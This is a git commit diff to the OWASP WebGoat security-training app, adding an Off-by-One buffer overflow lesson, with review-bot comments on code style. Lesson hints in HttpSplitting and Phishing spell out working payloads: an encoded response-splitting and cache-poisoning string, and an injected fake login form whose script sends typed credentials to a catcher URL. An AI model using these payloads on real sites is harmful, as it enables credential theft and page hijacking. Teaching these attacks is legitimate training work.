Added Buffer Overflow lesson, added and updated solutions, fixed errors in lessons preventing them from being completed correctly

git-svn-id: http://webgoat.googlecode.com/svn/trunk/webgoat@436 4033779f-a91e-0410-96ef-6bf7bf53c507
x71c4l@gmail.com 2011-08-12 03:00:27 +00:00
parent be8b4311e0
commit 4059bb5d33
110 changed files with 2590 additions and 1116 deletions


@ -1,103 +0,0 @@
package org.owasp.webgoat.lessons;
import java.util.ArrayList;
import java.util.List;
import org.apache.ecs.Element;
import org.apache.ecs.StringElement;
import org.owasp.webgoat.session.WebSession;
/***************************************************************************************************
*
*
* This file is part of WebGoat, an Open Web Application Security Project utility. For details,
* please see http://www.owasp.org/
*
* Copyright (c) 2002 - 2007 Bruce Mayhew
*
* This program is free software; you can redistribute it and/or modify it under the terms of the
* GNU General Public License as published by the Free Software Foundation; either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
* even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License along with this program; if
* not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
* 02111-1307, USA.
*
* Getting Source ==============
*
* Source for this application is maintained at code.google.com, a repository for free software
* projects.
*
* For details, please see http://code.google.com/p/webgoat/
*
* @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003
*/
public class BufferOverflow extends LessonAdapter
{
/**
* Description of the Method
*
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
// just to get the generic how to text.
return super.createContent(s);
}
/**
* Gets the category attribute of the ForgotPassword object
*
* @return The category value
*/
protected Category getDefaultCategory()
{
return Category.BUFFER_OVERFLOW;
}
/**
* Gets the hints attribute of the HelloScreen object
*
* @return The hints value
*/
public List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints.add("Lesson Hint 1");
hints.add("Lesson Hint 2");
return hints;
}
private final static Integer DEFAULT_RANKING = new Integer(15);
protected Integer getDefaultRanking()
{
return DEFAULT_RANKING;
}
/**
* Gets the title attribute of the HelloScreen object
*
* @return The title value
*/
public String getTitle()
{
return ("Buffer Overflow");
}
public Element getCredits()
{
return new StringElement("This screen created by: Your name could go here");
}
}


@ -92,7 +92,7 @@ public class CSRF extends LessonAdapter
String title = HtmlEncoder.encode(s.getParser().getRawParameter(TITLE, ""));
String message = s.getParser().getRawParameter(MESSAGE, "");
Connection connection = DatabaseUtilities.getConnection(s);
Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
String query = "INSERT INTO messages VALUES (?, ?, ?, ?, ? )";
@ -221,7 +221,7 @@ public class CSRF extends LessonAdapter
try
{
Connection connection = DatabaseUtilities.getConnection(s);
Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
// edit by Chuck Willis - Added logic to associate similar usernames
// The idea is that users chuck-1, chuck-2, etc will see each other's messages
@ -280,7 +280,7 @@ public class CSRF extends LessonAdapter
{
int messageNum = s.getParser().getIntParameter(NUMBER, 0);
Connection connection = DatabaseUtilities.getConnection(s);
Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
String query = "SELECT * FROM messages WHERE user_name LIKE ? and num = ? and lesson_type = ?";
PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
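Review bot: The new `DatabaseUtilities.getConnection(getNameroot(s.getUserName()), s.getWebgoatContext())` expression is pasted verbatim into all three hunks of this file; a private helper such as `private Connection getConnection(WebSession s) throws Exception { return DatabaseUtilities.getConnection(getNameroot(s.getUserName()), s.getWebgoatContext()); }` (declaring whatever checked exception the utility actually throws) would keep the per-user scoping in one place and make a later change a one-line edit. Each connection is obtained inside a try whose end lies outside the hunk, so whether it is closed on the error path cannot be seen here and is worth confirming. The enclosing methods start and end outside these hunks.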


@ -57,11 +57,11 @@ public class Category implements Comparable
public final static Category XSS = new Category("Cross-Site Scripting (XSS)", new Integer(900));
public final static Category DOS = new Category("Denial of Service", new Integer(1000));
public final static Category ERROR_HANDLING = new Category("Improper Error Handling", new Integer(1000));
public final static Category ERROR_HANDLING = new Category("Improper Error Handling", new Integer(1100));
public final static Category INJECTION = new Category("Injection Flaws", new Integer(1100));
public final static Category INJECTION = new Category("Injection Flaws", new Integer(1200));
public final static Category DOS = new Category("Denial of Service", new Integer(1200));
public final static Category INSECURE_COMMUNICATION = new Category("Insecure Communication", new Integer(1300));
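Review bot: After this change `INJECTION` and `DOS` both carry `new Integer(1200)`, which reintroduces the same tie the hunk removes between DOS and ERROR_HANDLING at 1000; if Category's compareTo (outside this hunk) orders by ranking, two categories that compare as equal may collide in a sorted set or sort unstably. Giving DOS its own slot, e.g. `public final static Category DOS = new Category("Denial of Service", new Integer(1250));`, keeps the ordering total between INJECTION at 1200 and INSECURE_COMMUNICATION at 1300.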


@ -338,7 +338,7 @@ public class ClientSideFiltering extends SequentialLessonAdapter
hints.add("Stage 1: Look in the last row of the hidden table.");
hints
.add("Stage 1: You can access the server directly <a href = \"/WebGoat/lessons/Ajax/clientSideFiltering.jsp?userId=102\">here </a>"
.add("Stage 1: You can access the server directly <a href = \"/webgoat/lessons/Ajax/clientSideFiltering.jsp?userId=102\">here </a>"
+ "to see what results are being returned");
hints.add("Stage 2: The server uses an XPath query agasinst an XML database.");
@ -346,7 +346,7 @@ public class ClientSideFiltering extends SequentialLessonAdapter
hints.add("Stage 2: The query currently returns all of the contents of the database.");
hints
.add("Stage 2: The query should only return the information of employees who are managed by Moe Stooge, who's userID is 102");
.add("Stage 2: The query should only return the information of employees who are managed by Moe Stooge, whose userID is 102");
hints.add("Stage 2: Try using a filter operator.");
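Review bot: The hint at the first hunk now hard-codes the context path in `/webgoat/lessons/Ajax/clientSideFiltering.jsp?userId=102`; servlet containers resolve context paths case-sensitively, so the link breaks again for a deployment mounted under /WebGoat, which is exactly what the replaced line assumed. The same literal case flip is made in DOMXSS and Phishing in this commit, while the comment block in Phishing still reads /WebGoat/catcher, so the two spellings already coexist. Building the link from the request's context path, if WebSession exposes the servlet request, or from one shared constant would stop the spellings drifting. The `who's` to `whose` fix at the second hunk is fine.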


@ -74,7 +74,7 @@ public class DOMInjection extends LessonAdapter
s.getResponse().setHeader("Cache-Control", "no-cache");
PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
out.print("document.forms[0].SUBMIT.disabled = false;");
out.print("document.form.SUBMIT.disabled = false;");
out.flush();
out.close();
return;
@ -182,7 +182,7 @@ public class DOMInjection extends LessonAdapter
List<String> hints = new ArrayList<String>();
hints.add("This page is using XMLHTTP to comunicate with the server.");
hints.add("Try to find a way to inject the DOM to enable the Activate button.");
hints.add("Intercept the reply and replace the body with document.forms[0].SUBMIT.disabled = false;");
hints.add("Intercept the reply and replace the body with document.form.SUBMIT.disabled = false;");
return hints;
}
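Review bot: The script literal `document.form.SUBMIT.disabled = false;` now appears both in the response written at the first hunk and in the hint at the second, and this commit had to change both to keep them in step; a single `private static final String ENABLE_SUBMIT_SCRIPT = "document.form.SUBMIT.disabled = false;";` used in both places would prevent the next drift. The new selector assumes the page's form element is named `form`, which is defined outside this hunk, so confirm the markup carries that name. The PrintWriter at the first hunk is built over the raw output stream with no charset, so the script is encoded with the platform default; `s.getResponse().getWriter()` would honor the response encoding.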


@ -243,7 +243,7 @@ public class DOMXSS extends SequentialLessonAdapter
if (getLessonTracker(s).getStage() == 1)
{
instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: <a href = '/WebGoat/images/logos/owasp.jpg'>OWASP IMAGE</a>";
instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: <a href = '/webgoat/images/logos/owasp.jpg'>OWASP IMAGE</a>";
}
else if (getLessonTracker(s).getStage() == 2)
{


@ -228,11 +228,11 @@ public class HttpSplitting extends SequentialLessonAdapter
hints.add("The Content-Length: 0 will tell the server that the first request is over.");
hints.add("A 200 OK message looks like this: HTTP/1.1 200 OK");
hints
.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/> Try: language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/> Try: foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked!%3C%2Fhtml%3E <br/>For insight into what this does, use the PHP charset encoder to decode it.");
hints
.add("Cache Poisoning starts with including 'Last-Modified' header in the hijacked page and setting it to a future date.");
hints
.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/>Try language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202030%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/>Try foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202080%2014%3A50%3A18%20GMT%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked%20J%3C%2Fhtml%3E");
hints
.add("'Last-Modified' header forces the browser to send a 'If-Modified-Since' header. Some cache servers will take the bait and keep serving the hijacked page");
hints
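Review bot: The second new hint ends its page body with `%3Chtml%3EHacked%20J%3C%2Fhtml%3E`, where the stray `J` looks like a leftover from a symbol-font smiley pasted out of a word processor; the first new hint uses `Hacked!`, so the second should match it. The two hints otherwise duplicate one long encoded string that differs only by the Last-Modified header, so building the second from the first, or holding both in named constants, would make the difference visible and keep them from diverging again. The enclosing getHints method continues past this hunk.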


@ -361,7 +361,7 @@ public class MaliciousFileExecution extends LessonAdapter
String instructions = "The form below allows you to upload an image which will be displayed on this page. "
+ "Features like this are often found on web based discussion boards and social networking sites. "
+ "This feature is vulnerable to Malicious File Execution."
+ "<br><br>In order to pass this lession, upload and run a malicious file. In order to prove that your file can execute,"
+ "<br><br>In order to pass this lesson, upload and run a malicious file. In order to prove that your file can execute,"
+ " it should create another file named:<br><br> "
+ uploads_and_target_parent_directory
+ TARGET_RELATIVE_PATH


@ -0,0 +1,518 @@
package org.owasp.webgoat.lessons;
import java.util.ArrayList;
import java.util.List;
import org.apache.ecs.Element;
import org.apache.ecs.ElementContainer;
import org.apache.ecs.StringElement;
import org.apache.ecs.html.IMG;
import org.apache.ecs.html.Input;
import org.apache.ecs.html.TD;
import org.apache.ecs.html.TR;
import org.apache.ecs.html.Table;
import org.apache.ecs.xhtml.br;
import org.owasp.webgoat.session.ECSFactory;
import org.owasp.webgoat.session.ParameterNotFoundException;
import org.owasp.webgoat.session.ValidationException;
import org.owasp.webgoat.session.WebSession;
/***************************************************************************************************
*
*
* This file is part of WebGoat, an Open Web Application Security Project utility. For details,
* please see http://www.owasp.org/
*
* Copyright (c) 2002 - 2007 Bruce Mayhew
*
* This program is free software; you can redistribute it and/or modify it under the terms of the
* GNU General Public License as published by the Free Software Foundation; either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
* even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License along with this program; if
* not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
* 02111-1307, USA.
*
* Getting Source ==============
*
* Source for this application is maintained at code.google.com, a repository for free software
* projects.
*
* For details, please see http://code.google.com/p/webgoat/
*
* @author Yiannis Pavlosoglou <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created December 05, 2009
*/
public class OffByOne extends LessonAdapter
{
private final static String[] price_plans = { "$1.99 - 1 hour ", "$5.99 - 12 hours", "$9.99 - 24 hours"};
private final static String ROOM_NUMBER = "room_no";
private final static String FIRST_NAME = "first_name";
private final static String LAST_NAME = "last_name";
private final static String PRICE_PLAN = "price_plan";
private final static IMG LOGO = new IMG("images/logos/seleucus.png").setAlt("Seleucus Ltd")
.setBorder(0).setHspace(0).setVspace(0);
/**
* <p>The main method for creating content, implemented
* from the the LessonAdapter class.</p>
*
* <p>This particular "Off-by-One" lesson belonging in
* the category of "Buffer Overflows" carries three
* steps.</p>
*
* @param s
* WebSession
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
try
{
if(isFirstStep(s))
{
ec.addElement(makeFirstStep(s));
}
else
{
if (isSecondStep(s))
{
ec.addElement(makeSecondStep(s));
}
else
{
ec.addElement(makeThirdStep(s));
}
}
} catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
e.printStackTrace();
}
return (ec);
}
/**
* <p>Returns the Buffer Overflow category for this
* lesson.</p>
*
* @return The category value
*/
protected Category getDefaultCategory()
{
return Category.BUFFER_OVERFLOW;
}
/**
* <p>Returns the hints as a List of Strings
* for this lesson.</p>
*
* @return The hints values
*/
public List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints.add("While registering for Internet usage, see where else your details are used during the registration process.");
hints.add("See which fields during the registration process, allow for really long input to be submitted.");
hints.add("Check for hidden form fields during registration");
hints.add("Typically, web-based buffer overflows occur just above the value of 2 to the power of a number. E.g. 1024 + 1, 2048 + 1, 4096 + 1");
return hints;
}
/**
* <p>Get the default ranking within the "Buffer
* Overflow" category.</p>
*
* <p>Currently ranked to be the first lesson in
* this category.</p>
*
* @return The value of 5 as an Integer Object
*/
protected Integer getDefaultRanking()
{
return new Integer(5);
}
/**
* <p>Gets the title attribute for this lesson.</p>
*
* @return "Off-by-One Overflows"
*/
public String getTitle()
{
return ("Off-by-One Overflows");
}
/**
* yada, yada...
*/
public Element getCredits()
{
return super.getCustomCredits("Created by Yiannis Pavlosoglou ", LOGO);
}
/**
* <p>Based on the parameters currently with values, this method
* returns true if we are in the first step of this lesson.</p>
*
* @param s
* @return true if we are in the first step of the lesson.
*/
protected boolean isFirstStep(WebSession s)
{
String room = s.getParser().getRawParameter(ROOM_NUMBER, "");
String name = s.getParser().getRawParameter(FIRST_NAME, "");
String last = s.getParser().getRawParameter(LAST_NAME, "");
return (room.isEmpty() && name.isEmpty() && last.isEmpty() );
}
/**
* <p>Based on the parameters currently with values, this method
* returns true if we are in the second step of this lesson.</p>
*
* @param s
* @return true if we are in the second step of the lesson
*/
protected boolean isSecondStep(WebSession s)
{
String price = s.getParser().getRawParameter(PRICE_PLAN, "");
return price.isEmpty();
}
/**
* <p>Method for constructing the first step and returning it as
* an Element.</p>
*
* @param s
* @return The Element that is the first step.
*/
private Element makeFirstStep(WebSession s)
{
ElementContainer ec = new ElementContainer();
String param = "";
// Header
ec.addElement(new StringElement("In order to access the Internet, you need to provide us the following information:"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Step 1/2"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Ensure that your first and last names are entered exactly as they appear in the hotel's registration system."));
ec.addElement(new br());
ec.addElement(new br());
// Table
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor())
{
t.setBorder(1);
}
// First Name
try {
param = s.getParser().getStrictAlphaParameter(FIRST_NAME, 25);
} catch (ParameterNotFoundException e) {
param = "";
} catch (ValidationException e) {
param = "";
}
Input input = new Input(Input.TEXT, FIRST_NAME, param);
TR tr = new TR();
tr.addElement(new TD().addElement("First Name: "));
tr.addElement(new TD().addElement(input));
tr.addElement(new TD().addElement("*"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Last Name
try {
param = s.getParser().getStrictAlphaParameter(LAST_NAME, 25);
} catch (ParameterNotFoundException e) {
param = "";
} catch (ValidationException e) {
param = "";
}
input = new Input(Input.TEXT, LAST_NAME, param);
tr = new TR();
tr.addElement(new TD().addElement("Last Name: "));
tr.addElement(new TD().addElement(input));
tr.addElement(new TD().addElement("*"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Room Number
try {
param = s.getParser().getStrictAlphaParameter(ROOM_NUMBER, 25);
} catch (ParameterNotFoundException e) {
param = "";
} catch (ValidationException e) {
param = "";
}
input = new Input(Input.TEXT, ROOM_NUMBER, param);
tr = new TR();
tr.addElement(new TD().addElement("Room Number: "));
tr.addElement(new TD().addElement(input));
tr.addElement(new TD().addElement("*"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Submit
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement(ECSFactory.makeButton("Submit")));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
ec.addElement(t);
// Footer
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("* The above fields are required for login."));
ec.addElement(new br());
ec.addElement(new br());
return ec;
}
/**
* <p>Method for constructing the second step and returning it as
* an Element.</p>
*
* @param s
* @return The Element that is the second step.
*/
private Element makeSecondStep(WebSession s)
{
ElementContainer ec = new ElementContainer();
String param = "";
// Header
ec.addElement(new StringElement("Please select from the following available price plans:"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Step 2/2"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Ensure that your selection matches the hours of usage, as no refunds are given for this service."));
ec.addElement(new br());
ec.addElement(new br());
// Table
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor())
{
t.setBorder(1);
}
// First Empty Row
TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Price Plans
tr = new TR();
tr.addElement(new TD().addElement("Available Price Plans:"));
tr.addElement(new TD().addElement(ECSFactory.makePulldown(PRICE_PLAN, price_plans, price_plans[2], 1)));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Submit
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement(ECSFactory.makeButton("Accept Terms")));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
ec.addElement(t);
ec.addElement("\r\n");
// Hidden Form Fields
param = s.getParser().getStringParameter(LAST_NAME, "");
Input input = new Input(Input.HIDDEN, LAST_NAME, param);
ec.addElement(input);
ec.addElement("\r\n");
param = s.getParser().getStringParameter(FIRST_NAME, "");
input = new Input(Input.HIDDEN, FIRST_NAME, param);
ec.addElement(input);
ec.addElement("\r\n");
param = s.getParser().getStringParameter(ROOM_NUMBER, "");
input = new Input(Input.HIDDEN, ROOM_NUMBER, param);
ec.addElement(input);
ec.addElement("\r\n");
// Footer
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("By Clicking on the above you accept the terms and conditions."));
ec.addElement(new br());
ec.addElement(new br());
return ec;
}
/**
* <p>Method for constructing the third step and returning it as
* an Element.</p>
*
* @param s
* @return The Element that is the third step.
*/
private Element makeThirdStep(WebSession s)
{
ElementContainer ec = new ElementContainer();
String param = "";
// Header
ec.addElement(new StringElement("You have now completed the 2 step process and have access to the Internet"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Process complete"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Your connection will remain active for the time allocated for starting now."));
ec.addElement(new br());
ec.addElement(new br());
// Table
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor())
{
t.setBorder(1);
}
// First Empty Row
TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Price Plans
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Submit
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
ec.addElement(t);
ec.addElement("\r\n");
// Hidden Form Fields
param = s.getParser().getStringParameter(LAST_NAME, "");
Input input = new Input(Input.HIDDEN, "a", param);
ec.addElement(input);
ec.addElement("\r\n");
param = s.getParser().getStringParameter(FIRST_NAME, "");
input = new Input(Input.HIDDEN, "b", param);
ec.addElement(input);
ec.addElement("\r\n");
param = s.getParser().getStringParameter(ROOM_NUMBER, "");
input = new Input(Input.HIDDEN, "c", param);
ec.addElement(input);
ec.addElement("\r\n");
// And finally the check...
if(param.length() > 4096)
{
ec.addElement(new Input(Input.hidden, "d", "Johnathan"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "e", "Ravern"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "f", "4321"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "g", "John"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "h", "Smith"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "i", "56"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "j", "Ana"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "k", "Arneta"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "l", "78"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "m", "Lewis"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "n", "Hamilton"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "o", "9901"));
ec.addElement("\r\n");
// :)
makeSuccess(s);
}
// Footer
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("We would like to thank you for your payment."));
ec.addElement(new br());
ec.addElement(new br());
return ec;
}
}
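Review bot: In makeThirdStep the final `if(param.length() > 4096)` check applies only to whatever was last assigned to `param`, which is the ROOM_NUMBER value read three lines earlier, and reusing one local for all three fields hides that; naming it, `String room = s.getParser().getStringParameter(ROOM_NUMBER, "");` followed by `if (room.length() > 4096)`, makes the success condition explicit and matches what the hints describe. makeSecondStep and makeThirdStep read FIRST_NAME, LAST_NAME and ROOM_NUMBER with getStringParameter and place the raw values into hidden Input elements, while makeFirstStep restricts the same fields with getStrictAlphaParameter(..., 25); that asymmetry is presumably the lesson's intended bypass, but whether ECS escapes attribute values is not visible here and should be confirmed, since otherwise steps 2 and 3 reflect arbitrary input beyond the length the lesson needs. createContent's `catch (Exception e)` only calls e.printStackTrace() and sets a message without the cause, so a failure leaves nothing but stderr output; at minimum include the exception in the message or one log line. `Input.hidden` in the success block versus `Input.HIDDEN` earlier in the same method is an inconsistency worth unifying if both constants resolve.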


@ -170,21 +170,21 @@ public class Phishing extends LessonAdapter
+ "Try to make the form look official.");
hints
.add("Try: <BR> "
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("Add functionality that can post a request, a button might work<BR><BR>"
+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
+ "http://localhost/WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
+ "http://localhost/webgoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
hints
.add("Try: <BR> "
+ "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot;&gt;"
+ "<BR><BR>Solution for this hint:<BR><BR>"
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "<BR><BR>In the whole script:<BR><BR>"
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
@ -192,49 +192,52 @@ public class Phishing extends LessonAdapter
.add("Make the button perform an action on submit, <BR>"
+ "adding an onclick=\"hack()\" might work<BR>"
+ "Don't forget to add the hack() javascript function"
+ "<BR><BR>Solution for this hint:<BR><BR>"
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "<BR><BR>In the whole script:<BR><BR>"
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;<BR>"
+ "Also, check firebug. Does the search form need to be terminated for this to work...? (&lt;/form&gt;)");
hints
.add("You need to create the hack() function. This function will pull the credentials from the "
+ "webpage and post them to the WebGoat catcher servlet. <BR>"
+ "<BR> Some useful code snippets:<UL>"
+ "<LI>doucument.forms[0].user.value - will access the user field"
+ "<LI>doucument.phish.user.value - will access the user field"
+ "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
+ "<LI>javascript string concatentation uses a \"+\" </UL>"
+ "<BR><BR>Solution for this hint():<BR><BR>"
+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.forms[0].user.value + &quot;\nPassword = &quot; + document.forms[0].pass.value); "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}"
+ "<BR><BR>The entire javascript portion:<BR><BR>"
+ "&lt;script&gt;function hack(){ "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
+ "alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; + document.phish.pass.value);} "
+ "&lt;/script&gt;");
hints
.add("Complete solution for this lesson:<BR><BR>"
+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.forms[0].user.value + &quot;\nPassword = &quot; + document.forms[0].pass.value); "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}"
